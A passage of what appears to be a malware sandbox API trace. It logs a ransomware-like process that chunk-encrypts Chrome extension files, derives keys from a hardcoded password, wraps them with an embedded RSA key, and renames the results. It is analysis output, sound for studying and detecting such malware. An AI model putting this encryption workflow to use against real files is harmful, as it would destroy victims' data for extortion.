hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.215] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.215] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.215] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.215] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.215] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.215] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.215] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.215] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.216] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.216] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.216] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.216] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.216] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.216] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.216] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.217] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.217] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.217] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.217] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.217] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.217] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.217] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.217] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.217] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.217] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.217] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.217] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.217] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.217] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.217] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.217] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.217] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.218] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.218] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.218] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.218] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.218] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.218] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.218] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.218] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.218] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.218] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.218] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.218] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.218] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.218] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.218] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.218] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.219] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.219] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.219] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x9c, lpOverlapped=0x0) returned 1 [0261.219] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x9c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0xa0) returned 1 [0261.219] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0xa0, lpOverlapped=0x0) returned 1 [0261.219] CloseHandle (hObject=0x5d64) returned 1 [0261.219] CloseHandle (hObject=0x5d50) returned 1 [0261.219] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), bFailIfExists=0) returned 1 [0261.222] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js", dwFileAttributes=0x0) returned 1 [0261.222] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.gsg")) returned 1 [0261.223] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.fuck")) returned 1 [0261.225] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0261.225] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0261.225] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.225] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.225] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.225] GetLastError () returned 0x0 [0261.225] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js")) returned 0x20 [0261.225] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js", dwFileAttributes=0x80) returned 1 [0261.225] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.226] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.227] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.gsg", dwFileAttributes=0x2) returned 1 [0261.227] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.229] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.229] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.229] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.229] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0261.229] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.229] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.229] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e724f8) returned 1 [0261.229] CryptImportPublicKeyInfo (in: hCryptProv=0x2e724f8, dwCertEncodingType=0x1, pInfo=0x2eabf00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eabf30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eabf38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7d400) returned 1 [0261.229] CryptEncrypt (in: hKey=0x2e7d400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.229] CryptEncrypt (in: hKey=0x2e7d400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72608*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e72608*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.230] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e72608*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e72608*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.230] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.232] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.232] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.234] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.234] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.234] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.234] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.234] CryptEncrypt (in: 